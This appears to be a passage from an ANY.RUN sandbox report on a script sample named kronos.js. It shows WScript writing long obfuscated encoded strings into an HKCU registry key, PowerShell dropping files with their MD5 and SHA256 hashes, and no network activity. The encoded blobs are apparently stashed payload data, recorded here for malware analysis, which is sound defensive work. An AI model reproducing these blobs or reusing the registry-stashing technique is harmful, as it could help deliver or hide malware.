vvtuvvirvviivviivviivviivviivviivvtuvvtsvviuvvtpvvtyvvtovviivviuvviivviivviivviivvtivviwvvtwvvtyvvttvvttvviyvvtrvvitvvtivvtyvvtuvviuvvtqtqtqtuvvtsvviivvtovviivvtwvvtpvvttvvitvvtrvvtqiuvvtpvvtsvvtuvvtuvviuvvtyvvtpvviyvvtyvvtuvviuvvtqtuvvtqiuvvtpvviivvtovvtqtqtqtqtqtqtuvvtsvvtpvvtyvvitvvtqtovvtuvviivvtrvvtivviwvvtqtqiivviivvtwvvtuvvtwvvtyvvtrvvtqtyvvtqtqtqitvvitvvtuvvtuvvtpvvirvviuvvitvvtpvvtwvviuvvitvvtwvvtyvvtqrtvvtqtuvvttvvtuvvtivvtuvvtovvirvviuvvirvvtivvtqtrvvtqtuvvtqtqtuvvtivviuvvtpvvtwvvtwvviivviwvviivviivviivviivvtuvvtivvtpvvirvviyvvtpvvtivvtpvvtivvtqtrvvtqtyvvtqtqtqtuvvttvviuvvtpvvtwvviwvviivviwvviivviivviivviivvtpvvttvvitvvtyvvtwvvtqirvvtpvvitvviyvvtqtqtqtqtqtqttvvttvvitvvtsvvtqttvvitvvtwvvtpvvttvviuvvtqtwvviivvtqiivvirvvtivvtpvvtqtyvvtqtrvvtqtyvvtqtqtqttvvtqtqtyvvtwvvtsvvtyvvtwvvttvvirvvitvviuvvtovvitvviuvvitvvtivviwvvtrvvtqtpvviyvvtpvvtuvviuvvitvviivviuvviivviivviivviivvtivvtpvvtyvvtqtrvvtqtyvvtqtqtqtuvvtqiuvvtpvvttvvtwvviivvtsvviivviivviivviivvtuvvttvvtuvvttvvtpvviyvvtpvvtuvviuvvitvviivviuvviivviivviivviivvtuvvtivvtuvvtqiuvvtpvvitvvttvviivvtpvviivviivviivviivvtpvvirvvtovviyvvtqtpvvtpvvirvvtovvtovvtqtpvvtqttvviivvttvvtpvvirvvtyvvtivvtqtyvvtpvvirvvtqiuvvtpvvtsvvtyvvtuvvtqtpvvtpvvirvvtyvvtivvtqtpvvtuvvtwvvtpvvtsvvtyvviyvviivvitvvtpvvtsvvtyvvtuvviivvtyvviuvvtpvviwvvtyvviivvtsvviivviivviivviivviivviivvtovvtuvviivvitvvtpvviyvvtyvviuvvtqitvvtpvvirvviivvtqtuvvtwvvtuvvtivviuvvtpvviwvvitvviivvtsvviivviivviivviivvtuvvttvviuvvtpvvtovvtpvviivvtsvviivviivviivviivviivviivvtovvtuvvtqtpvviuvvtpvvtpvvtovviivvtsvviivviivviivviivviivviivvtovvtuvvtqtpvvtpvvirvviyvvtpvvtuvvttvvtuvvtivviuvvtpvviivvtovviivvtsvviivviivviivviivvtpvvirvvtyvviyvvtqtpvvtpvvttvvitvvtyvvtyvvtqtuvvtivvttvvirvvitvvtwvvtovvtuvvtwvvtsvvtpvvtsvvtuvviivvtwvvtyvvtpvvtsvvtyvviivvtwvvtpvviuvvtpvvtyvviuvviivvtsvviivviivviivviivvtpvvirvvtyvvtuvviivvitvvtpvvttvvitvvtqtqitvvtqttvvtyvvtuvviivvtyvvtqtwvvtyvvtovvtqtpvviuvvirvvtwvvtqiuvvtpvvttvvirvviivvtsvviivviivviivviivvtuvvttvviuvvtpvvttvvtuvviivvtsvviivviivviivviivvtpvvttvvtivvtovvtqtpvvtqtqtuvvtsvvtuvvtsvvtuvviivvtuvviuvvtuvvirvvtpvvirvviuvvtuvvtuvviyvvitvvttvvtuvvtuvvtpvvirvviuvvitvvtuvvtivvtpvvirvvtovvtuvvtqtpvvtuvvtovvtivviwvvtqttvvtuvviivvtpvvirvvtyvvtivvtqtyvvtpvvttvviuvvtpvvtqtqtovvtyvvtyvviuvvtpvvttvviuvvtpvvtqtwvvtovvtyvvtyvvtwvvtyvvtpvvtpvvttvviuvvtpvvtqtwvvtovvtyvvttvvttvvtpvvttvviuvvtpvvtqtwvvtovvtyvvtrvvtivvtrvvirvvitvvtovvtovvtyvvtwvviwvvtpvvttvviuvvtpvvtqtyvvtovvtyvvtqiyvvtpvvttvviuvvtpvvtqtwvvtovvtuvvttvvirvvtuvvtivviuvvtpvvtqtrvvtqtuvvtqtqtqtqiuvvirvvttvvtrvvtuvvtivviuvvtpvvtuvvtsvvtqtqtqtqtqtqiuvvirvvtrvviwvvtuvvtivviuvvtpvvtwvvtpvvtqrtvvtqiuvvirvvtrvvtrvvtuvvtivviuvvtpvvitvvirvvtqtrvvtqtqtqtqiuvvirvvtwvviwvvtuvvtivviuvvtpvvtsvvtwvvtqtuvvtqtqtqtqiuvvirvvtwvvtrvvtuvvtivviuvvtpvvirvvtqtqrtvvtqiuvvirvvtqiwvvtpvvtqttvviuvvtqtqtovvtuvvtqtivvtivviwvvtqtqiivviivvtuvvtivvtwvvitvvtuvvtsvvii
(PID) Process:(2220) WScript.exeKey:HKEY_CURRENT_USER\Software\admin
Operation:writeName:8
Value:
vviivvtyvviuvvtqtyvvtpvvttvvtovviuvvtqtyvviivviivvtovvtuvvtqiivvttvvtrvvitvvtqiuvvirvvtwvvirvvtuvvtivviuvvtpvvtpvvtwvviivviivviivviivviivviivvtuvvtsvvtpvvtyvvitvvtqtovvtyvviivvtwvviuvvtpvviwvviyvviivvitvviivviivviivviivvttvvttvviyvvtrvviivvtovviivvtovvtpvvttvviivviwvvtqtwvvtovvtyvviuvvtovvirvvtqtqtwvvtuvviivvtuvviuvvtuvviyvvitvvttvvtuvvtuvvtpvvirvviuvvitvvtuvvtwvvtuvvtwvvtuvvtivvtpvvirvvtovvtuvvtqtpvvtpvvtqttvviuvvtqtqtqiivvtpvvtuvvirvvtqtqtqtqtqtqtqtuvvtivvitvvtovvtyvvtivvtqtpvvttvvtivvtqtqtqtqtqtqiuvvtpvvtivvtqiivviuvviivviivviivviivvtpvvttvvtovviuvvtwvvtyvvtqtqtuvvtsvvtqiivvtpvvtyvvtsvvtuvvtqtqtqtqtqtqtuvvttvvtuvvtovvtpvviyvvtyvvtuvviivvtpvvtuvvtqtpvviyvvtyvvtuvvtqtpvvtuvvtqtpvviyvvtyvvtuvviivvitvvtuvvtqiivviivvtovvtivvtwvvtyvviuvvtpvviyvvtovvtqttvvtqtqtqtqtpvvirvvtovviyvvtqtpvvtpvvttvvitvvtyvvtwvvtqtpvvirvvtuvviivvttvvtpvvtivviwvvtyvvtqtivvtpvvtqtqttvvtqtqtqtqtqtuvvttvviivviivvtovvtovvtwvvitvviivviivvtwvvtuvvtyvvtpvvttvviuvvtyvvtuvvtqtqtpvvirvvitvvtpvvtpvvtuvvitvvtsvvtovvtuvvtwvvtwvvtivviwvvtyvvtqtivvtpvvtqtqttvvtqtqtqtqtqtuvvttvvtuvvtqiivviivvtwvvtuvvtyvvtpvvttvviuvvtyvvtuvvtqtqtpvvirvvitvvtpvvtpvvtsvvtyvviuvvtqitvvtpvvtuvvitvvtsvvtovvtyvvttvvttvvtpvvirvvtyvvtuvviivvitvvtqiivvirvvtovvtyvvtqtwvvtqtrvvirvvtyvvtivvtwvvtyvvtqttvvitvvtovvttvvirvvtyvvtivvtwvvtpvvtovvtuvvtwvvttvvtuvvtqiivviivvtovvtivvtwvvtyvvtuvvtwvviuvvtpvvtrvvirvviivvtpvviivviivviivviivvtpvvttvvitvvtyvvtqitvvtpvvttvvtivvtivvrtvviuvvirvvtwvvtrvviivviivvtovvtovvttvvtpvvtuvvtwvviuvvtpvvtyvvtrvvtqtivvtqtqtqtqtpvvttvvtivvtivvtqitvvtqtqtuvvtsvvtuvvtsvvitvvtivvtqtivvtqtwvviivviivvtovvtivvtwvvtyvviuvvtpvviyvviwvviivvtovviivviivviivviivvtpvvttvvtivvtivvtwvvtyvvtqtqtuvvtsvvtuvviivvtuvvirvviuvvirvvtqttvvitvvtivvtqtivvtqtwvvtuvviuvvtpvvirvviuvvtuvvtuvviyvvitvvttvvtuvvtuvvtpvvirvviuvvitvvtuvvtwvvtuvvtwvvtuvvttvvtpvvirvvtuvviyvvtqtpvvtpvvtqttvvirvvtqtqtqiivvtpvvtuvvtsvvtsvvtqtqtqtqtqtqtuvvttvviuvvtpvviwvvtqiivviyvviivviivviivviivvtuvvtsvvtpvvirvvtyvvirvvtwvvtyvvtpvvtuvvitvvtsvvtovvtyvvtovvtpvvtpvvirvvtyvvtwvvtwvvtqtpvvttvvitvvtqtrvvtpvvttvvirvvtyvvttvvtwvvtpvvtovvtuvvtivvtivvtuvvtivvtuvvtovvtpvviyvvtyvvtuvvtqtpvvtuvvtqtpvviyvvtyvvtuvviivvtpvvtuvvtqtpvviyvvtyvvtuvviivvitvvtuvvtqiivviivvtovvttvvtqitvviuvvtpvvtqiivvtqttvvtqtqtqtqtivvirvvtyvvttvvtwvvtqtrvvtpvvtpvvttvvitvvtyvvtwvvtqtpvvirvvtovvttvvtwvvtyvvtivviwvvtqiwvvtqttvvtyvvtuvvtqtpvvtuvvtsvvtpvvirvviivvtpvviivvttvviwvvtuvvtpvvirvvtyvvtpvvtqitvvtuvviivvtuvviuvvtpvvtuvvitvvtsvvtovvtyvvtwvviuvvtpvvttvvtovvtpvvrtvvtovvtyvvtwvvtpvviivviivvtovvtqtwvvtqtpvvirvvtyvvttvvtwvvtyvvtpvvttvvitvvtqtrvvtpvvtuvvtqtpvvirvvtyvvttvvtqitvvtqttvvitvvtwvvtuvvtqiuvvtpvvtovviuvviivvtovviivviivviivviivvtpvvttvvitvvtyvvtqitvvtpvvirvvtyvvtuvviivvitvviivviivvtyvvttvvtwvvtqtqiivvirvvtovvtyvvtqtqtrvvttvvtsvvtyvvttvvtwvvtqtovviyvvtrvvtqtpvvttvvtyvvttvvtqtyvvtqtrvviuvvirvvtwvviwvvtuvvtwvviuvvtpvvttvvtrvviivvtovviivviivviivviivvtuvvtsvvtivviwvvtqtqiivviivvtovvttvvtqitvviuvvtpvvtovviuvvtqtuvvtqtqtqtqtpvvttvvtivvttvvtqitvvtqtqtuvvtsvvtuvvtsvvitvvtivvtqttvvtqtwvvtuvvirvvtpvvirvviuvvtuvvtuvviyvvitvvttvvtuvvtuvvtpvvirvviuvvitvvtpvvttvviuvvitvvtqitvvtuvvtovvtpvvirvvtovviyvvtqtpvvtpvvtqttvviivvtqtqtqiivvtpvvtuvvtsvviyvvtqtqtqtqtqtqtuvvttvvtuvvtivvtpvviyvvtyvvtuvvtqtpvvtuvvtqtpvviyvvtyvvtuvviivvtpvvtuvvtqtpvviyvvtyvvtuvviivvitvvtuvvtqiivviivvtovvtovvtqitvviuvvtpvvtovvtovvtqtrvvtqtqtqtqtivviwvvtqtwvviuvvtpvvtivvtpvviivvitvviivviivviivviivvtpvvirvviivvtqtuvvtivviivviivvtovvtuvvtqtpvviivviivvtovvtuvviivvitvviuvvtpvvtsvvtsvvtqtrvvtqtqtqtqtpvvirvviyvvtpvvtuvvtivvtpvvtsvvtuvviyvviivvtyvviuvvtpvvtyvviwvviivvitvviivviivviivviivvtpvvttvvitvvtyvvtrvvtyvvtpvvtuvviyvvirvvtovvtyvvtyvvirvvtpvvirvvtuvvtuvviivvtyvvtpvvirvvtyvvirvvtqitvvttvvttvviyvvirvvtqttvvtyvviivvtqitvvtpvvirvvitvvttvvtpvvirvvtovvtrvvtwvvtqtpvvtuvviivvtivvtovvtyvvttvvtovvtpvviyvvtwvvtyvvtqtpvvtpvvtsvvtuvvtuvviivvtyvvttvvtpvvtwvviwvvtovvtuvvtrvvtpvvtpvvtwvvtovvitvvtqtpvvtqtpvvtqtqtqtqtivvtqttvvtrvvtovvtuvvtwvviuvvtpvvtwvvtovvitvvtqtpvvtqitvvtqtqtqtqiivvtpvvtovvtivvtovvtuvvtwvvtyvvtpvvtwvvtovvitvvtqtpvvtwvvtqiwvv
Executable files
0
Suspicious files
2
Text files
0
Unknown types
0

Dropped files

PID
Process
Filename
Type
3544powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\W2PAOVULZYZD7KFTQWZA.temp
MD5:
SHA256:
3544powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF1543b9.TMPbinary
MD5:6A4DD2AFE3AE71901499207B2E679221
SHA256:70FF1DC4A9544B62383FA8EB536826ECD74E8C8ED1658FED310C3A16CE01A451
3544powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:6A4DD2AFE3AE71901499207B2E679221
SHA256:70FF1DC4A9544B62383FA8EB536826ECD74E8C8ED1658FED310C3A16CE01A451
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
0
TCP/UDP connections
0
DNS requests
0
Threats
0

HTTP requests

No HTTP requests
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

No data

DNS requests

No data

Threats

No threats detected
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2024 ANY.RUN LLC. ALL RIGHTS RESERVED
ANY.RUN
Reports
kronos.js